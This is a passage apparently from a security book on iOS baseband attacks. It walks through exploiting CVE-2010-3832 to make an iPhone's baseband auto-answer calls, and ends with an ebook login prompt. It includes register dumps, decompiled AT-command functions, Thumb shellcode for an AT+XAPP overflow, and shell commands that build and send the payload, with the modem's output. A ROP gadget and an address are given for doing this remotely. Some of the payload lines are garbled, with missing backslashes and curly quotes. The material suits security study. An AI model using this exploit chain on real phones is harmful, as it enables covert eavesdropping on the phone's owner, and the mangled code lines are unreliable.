r6:   0x66666664   r7:   0xB0016978 r8:   0x00000000
r9:   0xA00028E4   r10:  0xB008E730 r11:  0xB008FE9C
r12:  0x45564E54   r13:  0xB008FABC r14:  0xFFFF1360
r15:  0x6666666C
SPSR: 0x60000013  DFAR:  0x00000024 DFSR: 0x00000005

Lo and behold, you have gained control over the program counter! Looking around the area referenced by the link register, you see that the function you were supposed to be returning from had no arguments and was called using a BL instruction. To test whether things are working, you try to return to a location that simply does a BX LR. Woohoo, this works as well! No crash log is produced and no signal is lost when you send a message with 0xFFFF058C as the 19th word of the TMSI.

Finally, you take a look at how to turn on auto-answer now. The 3GPP specification 27.007 together with the ITU specification T.250 make implementation of automatic answering of calls after a specified number of rings mandatory. The number of rings is specified in an S register, namely S0 and can be set using the AT command ATS0=n with n being the number of rings; its value can be queried using ATS0?. The contents of the S registers can be stored in NVRAM using AT&W, as a so-called ATC profile. After you have identified a function manipulating this ATC profile using error strings, you can hunt down the functions reading to and writing from NVRAM and figure out the in-memory format of the ATC profile. You then see that the following function get_at_sreg_value is called to query register Sn with k set to zero.

/* 0xA01B9F1B */
uint32_t _fastcall get_at_sreg_base_ptr(uint32_t a1, uint32_t a2)
{
  uint32_t *t1;
  uint32_t *t2;
  uint32_t result;

  t1 = &dword_B01B204C[15 * a1];
  t2 = &dword_B01B23D0[17 * a2];
  if ( t1[12] )
    result = t2[14] + t1[13];
  else
    result = 0;
  return result;
}
/* 0xA01C5AB7 */uint32_t _fastcall get_at_sreg_value(uint32_t k, uint32_t n)
{
  return *(get_at_sreg_base_ptr(9, k) + n + 8);
}

The plan takes shape: Using the knowledge gained from the previous functions allows you to set the S0 register remotely using a very short program. As a first step, you can write a little assembly program to set the S0 ring counter using the at+xapp overflow. An example looks this:

00000000 <write_ats0_reg>:
   0:  2107      movs r1, #7           /* can't load #9 directly (whitespace) */
   2:  1c88      adds r0, r1, #2       /* r0 = 9 */
   4:  1a49      subs r1, r1, r1       /* r1 = 0 */
   6:  47a8      blx  r5               /* call 0xA01B9F1B */
   8:  2401      movs r4, #1      
   a:  7204      strb r4, [r0, #8]     /* set S0 = 1 */
   c:  1b20      subs r0, r4, r4       /* r0 = 0, indicates ERROR */
   e:  b00a      add sp, #0x28        /* adjust stack pointer */
  10:  bd70      pop {r4, r5, r6, pc} /* clean continuation */
  12:  46c0      nop                  /* nop needed to align to word boundary */

A primitive way to test the above code then is the following:

# printf ‘AT+XAPP="####################################’ > xapp-bin
# printf ‘4444x1bx9fx1bxA066667777xF5x2Cx0BxB0’ >> xapp-bin
# printf ‘x07x21x88x1cx49x1axa8x47x01x24x04’ >> xapp-bin
# printf ‘x72x20x1bx0axb0x70xbdxc0x46"’ >> xapp-bin
# ./sendmodem "‘cat xapp-bin‘"
Sending command to modem: AT
---.+
AT
OK
Sending command to modem: AT+XAPP="####################################444466667
777?,
                                                                        
?!?I?G$r
p??F"
-..+
AT+XAPP="####################################444466667777?,
                                                           ?!?I?G$r
p??F"
ERROR
# ./sendmodem ‘ATS0?’
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: ATS0?
-...+
ATS0?
001

OK
#

As you see, the at+xapp payload manages to set the S0 register to one. If you call the iPhone now, it will automatically answer the call after the first ring. Let us now come to the last step and build the payload for switching on this feature remotely.

Modifying the above payload slightly to crash instead of writing the value, you can find out that the S0 register lives at address 0xB002D768 in memory. As an example, you could now use the following gadget to turn on auto-answer remotely:

0xA01EC43C 1C 61 C4 E5                             STRB    R6, [R4,#0x11C]
0xA01EC440 F0 81 BD E8                             LDMFD   SP!, {R4-R8,PC}

Note that you need to have continuation of execution after writing the value 1 to the above-mentioned address. Altogether this gives us a single message less than 100 bytes that succinctly demonstrating the exploitability of CVE-2010-3832.

Summary

We have given a thorough introduction to baseband attacks against iOS devices. From instilling you with background knowledge on cellular networks, we moved to showing you the inner workings of real-time operating systems running on the baseband chips of the various generations of iOS devices and the intricacies of their heap memory managers.

These rather theoretical aspects were then counterbalanced with a quick-start guide for getting a quick and dirty OpenBTS setup up-and-running. This setup allows you to run your own GSM test network for researching over-the-air baseband attacks in the lab.

We then dissected the actual cellular stacks and discussed their attack surface. We showed you techniques to use to find bugs yourself. Finally, we provided examples of two public vulnerabilities (one local, one remote) and explained the workings of the ultrasn0w unlock.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset